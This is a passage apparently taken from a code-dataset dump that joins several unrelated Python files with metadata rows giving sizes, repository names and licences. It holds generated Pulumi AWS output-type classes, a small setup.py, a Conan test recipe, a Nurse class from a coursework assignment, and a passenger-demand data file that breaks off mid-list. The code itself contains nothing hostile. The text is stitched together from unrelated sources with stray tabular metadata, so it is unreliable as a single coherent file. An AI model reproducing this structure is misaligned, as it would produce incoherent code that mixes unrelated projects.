def s3outposts(self) -> Optional[str]:
return pulumi.get(self, "s3outposts")
@property
@pulumi.getter
def sagemaker(self) -> Optional[str]:
return pulumi.get(self, "sagemaker")
@property
@pulumi.getter
def sdb(self) -> Optional[str]:
return pulumi.get(self, "sdb")
@property
@pulumi.getter
def secretsmanager(self) -> Optional[str]:
return pulumi.get(self, "secretsmanager")
@property
@pulumi.getter
def securityhub(self) -> Optional[str]:
return pulumi.get(self, "securityhub")
@property
@pulumi.getter
def serverlessrepo(self) -> Optional[str]:
return pulumi.get(self, "serverlessrepo")
@property
@pulumi.getter
def servicecatalog(self) -> Optional[str]:
return pulumi.get(self, "servicecatalog")
@property
@pulumi.getter
def servicediscovery(self) -> Optional[str]:
return pulumi.get(self, "servicediscovery")
@property
@pulumi.getter
def servicequotas(self) -> Optional[str]:
return pulumi.get(self, "servicequotas")
@property
@pulumi.getter
def ses(self) -> Optional[str]:
return pulumi.get(self, "ses")
@property
@pulumi.getter
def shield(self) -> Optional[str]:
return pulumi.get(self, "shield")
@property
@pulumi.getter
def signer(self) -> Optional[str]:
return pulumi.get(self, "signer")
@property
@pulumi.getter
def sns(self) -> Optional[str]:
return pulumi.get(self, "sns")
@property
@pulumi.getter
def sqs(self) -> Optional[str]:
return pulumi.get(self, "sqs")
@property
@pulumi.getter
def ssm(self) -> Optional[str]:
return pulumi.get(self, "ssm")
@property
@pulumi.getter
def ssoadmin(self) -> Optional[str]:
return pulumi.get(self, "ssoadmin")
@property
@pulumi.getter
def stepfunctions(self) -> Optional[str]:
return pulumi.get(self, "stepfunctions")
@property
@pulumi.getter
def storagegateway(self) -> Optional[str]:
return pulumi.get(self, "storagegateway")
@property
@pulumi.getter
def sts(self) -> Optional[str]:
return pulumi.get(self, "sts")
@property
@pulumi.getter
def swf(self) -> Optional[str]:
return pulumi.get(self, "swf")
@property
@pulumi.getter
def synthetics(self) -> Optional[str]:
return pulumi.get(self, "synthetics")
@property
@pulumi.getter
def timestreamwrite(self) -> Optional[str]:
return pulumi.get(self, "timestreamwrite")
@property
@pulumi.getter
def transfer(self) -> Optional[str]:
return pulumi.get(self, "transfer")
@property
@pulumi.getter
def waf(self) -> Optional[str]:
return pulumi.get(self, "waf")
@property
@pulumi.getter
def wafregional(self) -> Optional[str]:
return pulumi.get(self, "wafregional")
@property
@pulumi.getter
def wafv2(self) -> Optional[str]:
return pulumi.get(self, "wafv2")
@property
@pulumi.getter
def worklink(self) -> Optional[str]:
return pulumi.get(self, "worklink")
@property
@pulumi.getter
def workmail(self) -> Optional[str]:
return pulumi.get(self, "workmail")
@property
@pulumi.getter
def workspaces(self) -> Optional[str]:
return pulumi.get(self, "workspaces")
@property
@pulumi.getter
def xray(self) -> Optional[str]:
return pulumi.get(self, "xray")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ProviderIgnoreTags(dict):
def __init__(__self__, *,
key_prefixes: Optional[Sequence[str]] = None,
keys: Optional[Sequence[str]] = None):
if key_prefixes is not None:
pulumi.set(__self__, "key_prefixes", key_prefixes)
if keys is not None:
pulumi.set(__self__, "keys", keys)
@property
@pulumi.getter(name="keyPrefixes")
def key_prefixes(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "key_prefixes")
@property
@pulumi.getter
def keys(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "keys")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class GetAmiBlockDeviceMappingResult(dict):
def __init__(__self__, *,
device_name: str,
ebs: Mapping[str, str],
no_device: str,
virtual_name: str):
"""
:param str device_name: The physical name of the device.
:param Mapping[str, str] ebs: Map containing EBS information, if the device is EBS based. Unlike most object attributes, these are accessed directly (e.g. `ebs.volume_size` or `ebs["volume_size"]`) rather than accessed through the first element of a list (e.g. `ebs[0].volume_size`).
:param str no_device: Suppresses the specified device included in the block device mapping of the AMI.
:param str virtual_name: The virtual device name (for instance stores).
"""
pulumi.set(__self__, "device_name", device_name)
pulumi.set(__self__, "ebs", ebs)
pulumi.set(__self__, "no_device", no_device)
pulumi.set(__self__, "virtual_name", virtual_name)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> str:
"""
The physical name of the device.
"""
return pulumi.get(self, "device_name")
@property
@pulumi.getter
def ebs(self) -> Mapping[str, str]:
"""
Map containing EBS information, if the device is EBS based. Unlike most object attributes, these are accessed directly (e.g. `ebs.volume_size` or `ebs["volume_size"]`) rather than accessed through the first element of a list (e.g. `ebs[0].volume_size`).
"""
return pulumi.get(self, "ebs")
@property
@pulumi.getter(name="noDevice")
def no_device(self) -> str:
"""
Suppresses the specified device included in the block device mapping of the AMI.
"""
return pulumi.get(self, "no_device")
@property
@pulumi.getter(name="virtualName")
def virtual_name(self) -> str:
"""
The virtual device name (for instance stores).
"""
return pulumi.get(self, "virtual_name")
@pulumi.output_type
class GetAmiFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
"""
:param str name: The name of the AMI that was provided during image creation.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the AMI that was provided during image creation.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@pulumi.output_type
class GetAmiIdsFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@pulumi.output_type
class GetAmiProductCodeResult(dict):
def __init__(__self__, *,
product_code_id: str,
product_code_type: str):
pulumi.set(__self__, "product_code_id", product_code_id)
pulumi.set(__self__, "product_code_type", product_code_type)
@property
@pulumi.getter(name="productCodeId")
def product_code_id(self) -> str:
return pulumi.get(self, "product_code_id")
@property
@pulumi.getter(name="productCodeType")
def product_code_type(self) -> str:
return pulumi.get(self, "product_code_type")
@pulumi.output_type
class GetAutoscalingGroupsFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
"""
:param str name: The name of the filter. The valid values are: `auto-scaling-group`, `key`, `value`, and `propagate-at-launch`.
:param Sequence[str] values: The value of the filter.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the filter. The valid values are: `auto-scaling-group`, `key`, `value`, and `propagate-at-launch`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
The value of the filter.
"""
return pulumi.get(self, "values")
@pulumi.output_type
class GetAvailabilityZoneFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
"""
:param str name: The name of the filter field. Valid values can be found in the [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html).
:param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the filter field. Valid values can be found in the [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html).
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
return pulumi.get(self, "values")
@pulumi.output_type
class GetAvailabilityZonesFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
"""
:param str name: The name of the filter field. Valid values can be found in the [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html).
:param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the filter field. Valid values can be found in the [EC2 DescribeAvailabilityZones API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAvailabilityZones.html).
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
return pulumi.get(self, "values")
@pulumi.output_type
class GetElasticIpFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@pulumi.output_type
class GetPrefixListFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
"""
:param str name: The name of the filter field. Valid values can be found in the [EC2 DescribePrefixLists API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribePrefixLists.html).
:param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the filter field. Valid values can be found in the [EC2 DescribePrefixLists API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribePrefixLists.html).
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
return pulumi.get(self, "values")
@pulumi.output_type
class GetRegionsFilterResult(dict):
def __init__(__self__, *,
name: str,
values: Sequence[str]):
"""
:param str name: The name of the filter field. Valid values can be found in the [describe-regions AWS CLI Reference][1].
:param Sequence[str] values: Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the filter field. Valid values can be found in the [describe-regions AWS CLI Reference][1].
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Set of values that are accepted for the given filter field. Results will be selected if any given value matches.
"""
return pulumi.get(self, "values")
| 33.263542 | 291 | 0.601716 |
7762969e468e630cab9912c9e39aa8105f563ce4 | 327 | py | Python | setup.py | zhangalbert/a | 466b10ded2c85e7fceea60a95f081cb0b11b5222 | [
"Apache-2.0"
] | null | null | null | setup.py | zhangalbert/a | 466b10ded2c85e7fceea60a95f081cb0b11b5222 | [
"Apache-2.0"
] | null | null | null | setup.py | zhangalbert/a | 466b10ded2c85e7fceea60a95f081cb0b11b5222 | [
"Apache-2.0"
] | null | null | null | from distutils.core import setup
setup(name='a',
version='0.1.0',
packages=['a', 'a.security'],
install_requires=['WebOb>=1.6.1'],
author = "albert.zhang",
author_email = "longbao.zhang@gmail.com",
description = "This is a very light web framework",
license = "Apache License 2.0",
)
| 27.25 | 57 | 0.611621 |
89b0e07ae49fe144037df04696d84833f2fcc728 | 549 | py | Python | recipes/jpeg-compressor/all/test_package/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 562 | 2019-09-04T12:23:43.000Z | 2022-03-29T16:41:43.000Z | recipes/jpeg-compressor/all/test_package/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 9,799 | 2019-09-04T12:02:11.000Z | 2022-03-31T23:55:45.000Z | recipes/jpeg-compressor/all/test_package/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 1,126 | 2019-09-04T11:57:46.000Z | 2022-03-31T16:43:38.000Z | from conans import ConanFile, CMake, tools
import os
class TestPackageConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "cmake"
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def test(self):
if not tools.cross_building(self.settings):
img_path = os.path.join(self.source_folder, "testimg.jpg")
bin_path = os.path.join("bin", "test_package")
self.run("{} {}".format(bin_path, img_path), run_environment=True)
| 28.894737 | 78 | 0.624772 |
ba8efe4d5c94751efa02852fca36d1a0d96166a6 | 417 | py | Python | Assignment 2/main_lib/Nurse.py | toileto/OOIS_PCOM7E | 25e3c34d985e5cbc5aa3d69efba5370a23edf0a1 | [
"MIT"
] | null | null | null | Assignment 2/main_lib/Nurse.py | toileto/OOIS_PCOM7E | 25e3c34d985e5cbc5aa3d69efba5370a23edf0a1 | [
"MIT"
] | null | null | null | Assignment 2/main_lib/Nurse.py | toileto/OOIS_PCOM7E | 25e3c34d985e5cbc5aa3d69efba5370a23edf0a1 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from main_lib.HealthcareProfessional import HealthcareProfessional
class Nurse(HealthcareProfessional):
def __init__(self, name, appointment_schedule):
# Since Nurse inherited from HealthcareProfessional,
# we are using super method to activate its parent
# init method.
super(Nurse, self).__init__(name, appointment_schedule)
pass
| 29.785714 | 66 | 0.719424 |
5ea7d6b89558ef89f70aa5c7f56bb0f0498d44e9 | 258,510 | py | Python | instances/passenger_demand/pas-20210422-1717-int4e-1/17.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210422-1717-int4e-1/17.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210422-1717-int4e-1/17.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null |
"""
PASSENGERS
"""
numPassengers = 7640
passenger_arriving = (
(0, 3, 4, 1, 1, 1, 0, 1, 5, 0, 0, 1, 0, 1, 5, 2, 3, 3, 1, 2, 1, 1, 1, 0, 0, 0), # 0
(3, 3, 2, 3, 0, 0, 0, 1, 1, 1, 0, 0, 0, 3, 3, 1, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0), # 1
(2, 3, 4, 3, 3, 0, 2, 0, 1, 0, 0, 0, 0, 2, 3, 2, 0, 2, 1, 0, 3, 0, 1, 0, 1, 0), # 2
(2, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 2, 1, 0, 0, 0, 2, 1, 0, 0, 0), # 3
(1, 3, 0, 3, 2, 0, 0, 2, 1, 0, 0, 1, 0, 0, 3, 0, 2, 1, 3, 0, 1, 1, 3, 0, 0, 0), # 4
(4, 0, 1, 3, 3, 0, 1, 2, 3, 0, 1, 0, 0, 1, 4, 2, 5, 1, 1, 0, 1, 1, 1, 0, 0, 0), # 5
(4, 3, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 0, 3, 2, 2, 2, 4, 0, 6, 0, 0, 1, 0, 1, 0), # 6
(2, 4, 4, 1, 2, 2, 0, 0, 1, 1, 1, 0, 0, 4, 0, 1, 1, 4, 1, 2, 0, 2, 1, 2, 0, 0), # 7
(2, 4, 4, 0, 0, 0, 0, 0, 1, 2, 1, 0, 0, 3, 4, 2, 0, 3, 1, 0, 0, 1, 3, 0, 0, 0), # 8
(4, 2, 2, 2, 2, 0, 0, 2, 1, 1, 1, 0, 0, 1, 3, 4, 3, 1, 5, 2, 1, 2, 3, 1, 0, 0), # 9
(2, 8, 4, 2, 1, 4, 0, 2, 1, 0, 0, 1, 0, 2, 3, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0), # 10
(5, 4, 3, 2, 4, 0, 0, 0, 2, 0, 0, 0, 0, 5, 4, 6, 2, 4, 2, 2, 2, 1, 0, 0, 1, 0), # 11
(5, 1, 1, 5, 2, 0, 2, 3, 3, 1, 1, 0, 0, 4, 4, 6, 2, 6, 5, 1, 1, 1, 1, 0, 0, 0), # 12
(5, 5, 3, 3, 2, 2, 2, 0, 1, 0, 0, 0, 0, 2, 2, 3, 1, 0, 2, 0, 0, 0, 1, 0, 2, 0), # 13
(2, 3, 6, 1, 4, 1, 2, 3, 2, 0, 0, 0, 0, 5, 2, 3, 5, 2, 1, 2, 1, 1, 1, 1, 0, 0), # 14
(5, 3, 3, 1, 2, 1, 1, 4, 2, 0, 1, 0, 0, 5, 4, 4, 0, 0, 1, 1, 2, 1, 2, 2, 2, 0), # 15
(6, 3, 3, 5, 1, 3, 2, 2, 2, 1, 0, 0, 0, 2, 3, 1, 3, 3, 2, 2, 0, 2, 1, 2, 0, 0), # 16
(1, 3, 4, 5, 6, 1, 2, 1, 1, 0, 1, 0, 0, 2, 7, 2, 0, 4, 0, 5, 0, 2, 2, 1, 1, 0), # 17
(2, 4, 5, 5, 1, 0, 1, 1, 0, 3, 0, 0, 0, 7, 3, 4, 2, 2, 1, 1, 0, 2, 0, 0, 0, 0), # 18
(2, 4, 5, 1, 2, 1, 0, 3, 3, 0, 0, 1, 0, 2, 2, 6, 3, 3, 1, 0, 0, 2, 0, 1, 0, 0), # 19
(5, 3, 5, 4, 2, 1, 4, 1, 0, 0, 0, 0, 0, 3, 2, 2, 0, 3, 2, 2, 0, 1, 2, 0, 1, 0), # 20
(4, 5, 0, 3, 3, 0, 1, 2, 0, 3, 1, 0, 0, 2, 5, 2, 2, 3, 6, 1, 1, 2, 1, 2, 1, 0), # 21
(2, 1, 5, 4, 6, 1, 1, 2, 1, 3, 1, 2, 0, 2, 5, 6, 6, 2, 0, 1, 1, 2, 0, 1, 0, 0), # 22
(2, 6, 2, 0, 4, 0, 3, 3, 1, 2, 1, 0, 0, 2, 1, 1, 3, 3, 2, 1, 2, 3, 1, 0, 3, 0), # 23
(2, 4, 2, 3, 3, 2, 1, 2, 0, 1, 1, 0, 0, 3, 3, 0, 5, 5, 0, 3, 0, 1, 1, 3, 0, 0), # 24
(7, 4, 3, 0, 1, 3, 0, 1, 2, 0, 0, 0, 0, 9, 7, 4, 1, 5, 3, 2, 1, 3, 0, 2, 0, 0), # 25
(7, 4, 6, 3, 6, 3, 3, 0, 1, 1, 2, 0, 0, 3, 6, 2, 5, 5, 4, 1, 1, 2, 1, 2, 2, 0), # 26
(3, 6, 3, 1, 2, 4, 1, 1, 5, 0, 1, 0, 0, 7, 4, 3, 1, 4, 1, 0, 0, 2, 2, 0, 0, 0), # 27
(7, 2, 3, 1, 1, 0, 4, 2, 2, 1, 1, 0, 0, 7, 4, 1, 2, 2, 1, 3, 0, 4, 0, 0, 1, 0), # 28
(6, 5, 3, 5, 2, 1, 1, 1, 0, 1, 1, 0, 0, 3, 5, 5, 1, 2, 3, 1, 1, 4, 1, 1, 0, 0), # 29
(5, 4, 4, 4, 6, 2, 4, 2, 2, 0, 1, 0, 0, 5, 3, 3, 3, 3, 0, 6, 2, 1, 0, 0, 0, 0), # 30
(3, 5, 6, 4, 6, 2, 1, 1, 0, 0, 1, 0, 0, 2, 4, 3, 0, 4, 3, 1, 3, 2, 1, 0, 1, 0), # 31
(2, 8, 3, 0, 7, 3, 1, 2, 2, 1, 1, 0, 0, 4, 2, 2, 5, 3, 1, 1, 0, 1, 0, 2, 0, 0), # 32
(1, 2, 2, 3, 4, 1, 4, 2, 4, 3, 3, 0, 0, 1, 6, 7, 2, 2, 3, 1, 0, 2, 2, 1, 0, 0), # 33
(5, 2, 3, 2, 4, 1, 2, 1, 2, 0, 0, 1, 0, 6, 3, 3, 2, 3, 4, 2, 2, 3, 0, 0, 0, 0), # 34
(3, 3, 5, 2, 6, 1, 2, 1, 1, 0, 1, 1, 0, 2, 3, 2, 2, 3, 3, 1, 1, 1, 1, 0, 2, 0), # 35
(5, 5, 5, 4, 4, 2, 1, 4, 2, 0, 0, 0, 0, 4, 3, 2, 2, 3, 1, 3, 0, 1, 0, 0, 0, 0), # 36
(6, 5, 4, 3, 1, 3, 1, 2, 3, 0, 1, 0, 0, 2, 3, 3, 2, 0, 3, 1, 1, 3, 1, 0, 1, 0), # 37
(2, 5, 4, 5, 0, 3, 2, 0, 0, 4, 0, 0, 0, 6, 5, 2, 2, 1, 2, 1, 0, 4, 1, 1, 0, 0), # 38
(2, 4, 3, 5, 2, 1, 0, 1, 0, 1, 1, 1, 0, 2, 3, 0, 4, 1, 2, 1, 1, 1, 3, 0, 0, 0), # 39
(5, 2, 6, 5, 3, 1, 2, 1, 3, 0, 0, 0, 0, 7, 5, 4, 0, 4, 0, 1, 2, 1, 0, 3, 2, 0), # 40
(1, 4, 4, 4, 3, 3, 4, 0, 1, 1, 0, 0, 0, 5, 3, 1, 2, 3, 1, 2, 2, 2, 3, 1, 1, 0), # 41
(3, 1, 5, 5, 4, 1, 4, 2, 3, 1, 0, 0, 0, 5, 2, 4, 2, 0, 3, 2, 0, 2, 2, 0, 0, 0), # 42
(2, 2, 3, 5, 1, 3, 3, 1, 0, 0, 1, 1, 0, 2, 2, 2, 5, 5, 3, 1, 0, 1, 1, 1, 0, 0), # 43
(4, 3, 2, 6, 8, 2, 4, 0, 3, 2, 0, 0, 0, 6, 4, 2, 4, 4, 0, 2, 0, 1, 2, 1, 0, 0), # 44
(0, 10, 1, 3, 2, 0, 1, 0, 0, 1, 1, 0, 0, 4, 5, 1, 1, 3, 3, 0, 0, 1, 1, 0, 0, 0), # 45
(5, 1, 4, 3, 3, 1, 0, 1, 2, 1, 0, 0, 0, 3, 0, 4, 1, 2, 2, 1, 0, 6, 0, 1, 0, 0), # 46
(3, 3, 3, 5, 2, 0, 1, 4, 2, 1, 0, 0, 0, 2, 3, 5, 3, 4, 4, 2, 0, 3, 0, 0, 0, 0), # 47
(7, 2, 5, 1, 2, 1, 2, 1, 1, 3, 0, 0, 0, 5, 5, 1, 2, 4, 5, 1, 1, 2, 3, 1, 0, 0), # 48
(5, 2, 5, 1, 2, 2, 2, 2, 3, 2, 0, 0, 0, 4, 5, 0, 1, 1, 3, 2, 0, 2, 2, 1, 0, 0), # 49
(2, 5, 2, 6, 4, 3, 0, 0, 2, 1, 1, 0, 0, 6, 0, 3, 2, 1, 2, 2, 0, 2, 1, 1, 0, 0), # 50
(4, 2, 6, 3, 1, 1, 2, 0, 3, 0, 0, 1, 0, 1, 1, 2, 4, 6, 1, 0, 0, 1, 2, 0, 0, 0), # 51
(4, 5, 6, 4, 4, 0, 0, 2, 2, 2, 0, 0, 0, 2, 2, 1, 3, 2, 2, 3, 1, 1, 3, 2, 0, 0), # 52
(5, 3, 2, 2, 1, 1, 4, 2, 3, 0, 0, 0, 0, 10, 6, 0, 1, 1, 0, 0, 0, 4, 2, 1, 1, 0), # 53
(2, 6, 3, 5, 4, 3, 0, 2, 0, 0, 0, 0, 0, 3, 7, 4, 1, 2, 3, 1, 0, 3, 1, 1, 0, 0), # 54
(4, 8, 0, 2, 5, 0, 3, 3, 4, 0, 1, 0, 0, 2, 4, 4, 1, 2, 0, 0, 1, 2, 1, 0, 0, 0), # 55
(5, 4, 5, 3, 4, 0, 0, 1, 1, 0, 0, 1, 0, 2, 2, 3, 2, 3, 1, 2, 1, 3, 0, 1, 0, 0), # 56
(4, 3, 5, 4, 1, 2, 0, 2, 0, 0, 0, 0, 0, 6, 2, 4, 3, 3, 4, 5, 1, 1, 0, 0, 0, 0), # 57
(2, 6, 4, 6, 3, 2, 0, 1, 5, 0, 1, 1, 0, 2, 4, 1, 1, 5, 1, 0, 2, 2, 2, 0, 0, 0), # 58
(2, 2, 1, 1, 4, 0, 4, 1, 3, 1, 1, 0, 0, 6, 6, 1, 2, 4, 3, 1, 0, 0, 2, 1, 1, 0), # 59
(4, 1, 6, 2, 3, 0, 0, 0, 3, 0, 1, 0, 0, 4, 2, 3, 2, 1, 2, 1, 0, 1, 3, 2, 0, 0), # 60
(7, 3, 2, 5, 4, 1, 2, 0, 1, 1, 0, 0, 0, 3, 2, 3, 7, 2, 1, 0, 0, 1, 2, 0, 0, 0), # 61
(5, 2, 2, 3, 2, 0, 0, 1, 2, 2, 2, 0, 0, 4, 7, 1, 5, 5, 3, 0, 1, 3, 1, 2, 1, 0), # 62
(5, 3, 1, 5, 2, 2, 0, 1, 1, 0, 2, 0, 0, 6, 5, 6, 5, 2, 1, 0, 1, 2, 1, 0, 0, 0), # 63
(1, 3, 4, 2, 3, 0, 4, 1, 0, 0, 0, 1, 0, 4, 6, 0, 2, 1, 0, 3, 2, 2, 1, 0, 0, 0), # 64
(7, 7, 4, 3, 6, 2, 0, 2, 0, 0, 0, 0, 0, 3, 4, 5, 0, 4, 3, 1, 1, 1, 1, 0, 0, 0), # 65
(3, 6, 0, 2, 3, 1, 2, 2, 2, 0, 0, 1, 0, 11, 3, 3, 1, 6, 2, 2, 0, 1, 2, 1, 0, 0), # 66
(4, 1, 3, 2, 2, 3, 2, 1, 2, 2, 1, 0, 0, 5, 1, 3, 5, 3, 0, 1, 2, 2, 1, 0, 1, 0), # 67
(6, 5, 2, 3, 4, 5, 1, 4, 2, 0, 1, 0, 0, 3, 4, 1, 2, 2, 1, 2, 1, 2, 2, 0, 0, 0), # 68
(3, 1, 7, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 2, 5, 2, 5, 2, 0, 3, 1, 3, 2, 1, 0, 0), # 69
(2, 6, 3, 3, 5, 1, 1, 2, 1, 2, 0, 0, 0, 3, 8, 1, 3, 3, 0, 3, 0, 2, 1, 0, 0, 0), # 70
(0, 3, 4, 2, 5, 2, 1, 0, 1, 0, 0, 0, 0, 4, 6, 2, 6, 8, 1, 1, 1, 1, 0, 0, 0, 0), # 71
(1, 4, 3, 3, 0, 1, 0, 1, 3, 0, 1, 0, 0, 5, 7, 4, 1, 3, 1, 0, 0, 3, 3, 1, 0, 0), # 72
(4, 4, 3, 4, 2, 2, 1, 2, 3, 1, 0, 0, 0, 2, 3, 2, 1, 2, 2, 1, 0, 1, 1, 1, 0, 0), # 73
(2, 3, 1, 3, 3, 2, 2, 0, 3, 0, 1, 0, 0, 1, 5, 1, 2, 2, 1, 1, 0, 0, 0, 0, 0, 0), # 74
(3, 5, 1, 4, 3, 1, 2, 1, 1, 0, 0, 1, 0, 2, 3, 2, 3, 4, 5, 0, 1, 1, 0, 0, 0, 0), # 75
(4, 2, 0, 4, 1, 1, 3, 3, 4, 0, 0, 1, 0, 9, 3, 1, 3, 3, 1, 3, 1, 0, 2, 1, 0, 0), # 76
(3, 5, 4, 2, 6, 0, 3, 0, 3, 0, 1, 0, 0, 3, 5, 2, 1, 4, 2, 2, 1, 1, 1, 1, 1, 0), # 77
(3, 1, 3, 4, 3, 1, 0, 2, 1, 1, 1, 0, 0, 2, 3, 5, 2, 3, 1, 2, 1, 3, 2, 1, 1, 0), # 78
(7, 5, 5, 4, 4, 1, 2, 0, 2, 0, 1, 0, 0, 5, 7, 7, 2, 3, 2, 2, 0, 1, 1, 0, 0, 0), # 79
(3, 7, 5, 3, 2, 1, 0, 1, 0, 0, 0, 0, 0, 3, 3, 4, 0, 1, 3, 3, 1, 3, 1, 0, 0, 0), # 80
(7, 2, 4, 8, 2, 4, 1, 2, 1, 1, 1, 1, 0, 3, 5, 3, 2, 6, 1, 2, 1, 3, 0, 1, 0, 0), # 81
(8, 6, 4, 3, 4, 0, 3, 3, 3, 0, 0, 0, 0, 4, 4, 1, 2, 1, 0, 2, 2, 2, 1, 1, 0, 0), # 82
(4, 2, 2, 4, 1, 1, 3, 1, 0, 3, 2, 1, 0, 4, 7, 3, 0, 4, 1, 1, 0, 1, 3, 0, 1, 0), # 83
(3, 5, 1, 5, 4, 3, 2, 0, 2, 1, 1, 0, 0, 7, 5, 3, 5, 2, 0, 2, 0, 1, 2, 0, 0, 0), # 84
(2, 1, 3, 4, 1, 0, 1, 1, 0, 1, 1, 0, 0, 2, 5, 3, 2, 2, 1, 1, 1, 2, 1, 1, 0, 0), # 85
(4, 3, 3, 5, 7, 0, 1, 1, 3, 2, 0, 0, 0, 3, 5, 3, 2, 3, 2, 1, 1, 2, 0, 0, 0, 0), # 86
(4, 1, 3, 2, 4, 0, 1, 0, 1, 0, 1, 0, 0, 3, 4, 1, 3, 2, 3, 2, 1, 1, 2, 2, 0, 0), # 87
(2, 4, 5, 2, 2, 0, 1, 0, 0, 0, 1, 0, 0, 7, 2, 0, 4, 3, 0, 1, 0, 0, 0, 2, 0, 0), # 88
(7, 1, 5, 4, 6, 1, 3, 2, 2, 0, 0, 0, 0, 0, 5, 1, 2, 0, 0, 3, 1, 2, 0, 1, 0, 0), # 89
(5, 3, 8, 6, 4, 1, 1, 1, 1, 1, 1, 0, 0, 2, 2, 2, 3, 2, 3, 3, 0, 0, 0, 0, 0, 0), # 90
(6, 5, 5, 6, 1, 2, 0, 1, 2, 0, 0, 1, 0, 5, 4, 4, 0, 1, 2, 0, 0, 3, 2, 0, 0, 0), # 91
(4, 6, 3, 2, 3, 0, 2, 0, 2, 0, 0, 0, 0, 3, 3, 2, 0, 6, 2, 1, 0, 1, 1, 1, 0, 0), # 92
(6, 4, 3, 3, 2, 0, 0, 0, 1, 2, 0, 1, 0, 3, 7, 0, 2, 3, 4, 3, 0, 4, 2, 1, 1, 0), # 93
(3, 1, 2, 3, 1, 1, 2, 1, 1, 0, 1, 0, 0, 6, 3, 2, 2, 5, 0, 0, 0, 2, 0, 1, 0, 0), # 94
(5, 1, 5, 4, 6, 2, 0, 0, 1, 1, 0, 0, 0, 3, 2, 3, 6, 2, 0, 0, 0, 0, 1, 0, 0, 0), # 95
